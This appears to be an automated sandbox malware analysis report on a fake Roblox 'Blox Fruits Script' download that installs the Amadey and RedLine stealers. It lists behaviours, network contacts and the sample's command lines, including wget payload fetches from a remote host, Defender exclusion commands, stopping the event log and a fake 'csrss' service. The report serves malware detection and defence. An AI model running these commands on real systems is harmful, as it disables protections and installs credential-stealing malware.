Malware Analysis Report

2025-08-06 00:06

Sample ID 240223-mcv1zsfb84
Target https://lavacht.com/Blox_Fruits_Script/index.php
Tags
amadey redline 11 discovery evasion infostealer persistence spyware stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file https://lavacht.com/Blox_Fruits_Script/index.php was found to be: Known bad.

Malicious Activity Summary

Amadey

RedLine payload

RedLine

Stops running service(s)

Drops file in Drivers directory

Creates new service(s)

Executes dropped EXE

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer Phishing Filter

Suspicious behavior: GetForegroundWindowSpam

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Analysis: static1

Detonation Overview

Reported

2024-02-23 10:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 10:19

Reported

2024-02-23 10:31

Platform

win7-20240220-en

Max time kernel

338s

Max time network

316s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://lavacht.com/Blox_Fruits_Script/index.php

Signatures

Amadey

trojan amadey

RedLine

infostealer redline

RedLine payload

Creates new service(s)

persistence

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\SystemFiles\csrss.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\SystemFiles\csrss.exe N/A
File opened for modification C:\Windows\system32\services.msc C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Roaming\services\plugin0222 N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 40ad06af4266da01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EBA17231-D235-11EE-9FEE-EA42E82B8F01} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "414845820" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mmc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0048250d4366da01 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\mmc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: 33 N/A C:\Windows\system32\mmc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\mmc.exe N/A
Token: 33 N/A C:\Windows\system32\mmc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\mmc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 2908 wrote to memory of 1656 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://lavacht.com/Blox_Fruits_Script/index.php

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2908 CREDAT:275457 /prefetch:2

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\" -spe -an -ai#7zMap9804:234:7zEvent21423

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2908 CREDAT:472073 /prefetch:2

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

"C:\Users\Admin\AppData\Roaming\services\plugin0222"

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

"C:\Users\Admin\AppData\Roaming\services\3plugin0222"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "csrss"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "csrss"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\SystemFiles\csrss.exe

C:\ProgramData\SystemFiles\csrss.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\mmc.exe

"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 lavacht.com udp
US 172.67.174.197:443 lavacht.com tcp
US 172.67.174.197:443 lavacht.com tcp
US 8.8.8.8:53 www.lavalnk.site udp
US 172.67.200.168:443 www.lavalnk.site tcp
US 172.67.200.168:443 www.lavalnk.site tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 solvadordali.com udp
US 8.8.8.8:53 api.bing.com udp
NL 185.14.29.199:80 solvadordali.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
NL 185.14.29.199:80 solvadordali.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 mezla.site udp
NL 185.209.162.106:80 mezla.site tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
NL 194.87.31.18:3333 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script.zip.lljktkt.partial

C:\Users\Admin\AppData\Local\Temp\Cab1352.tmp

C:\Users\Admin\AppData\Local\Temp\Tar1355.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe.manifest

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\WinRAR.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\wget.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.exe.manifest

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\Launhcer.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\data\AppInfo\services\data\Launcher.dll

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar

\Users\Admin\AppData\Roaming\services\plugin0222

\Users\Admin\AppData\Roaming\services\wget.exe

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar

\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar

\Users\Admin\AppData\Roaming\services\3plugin0222
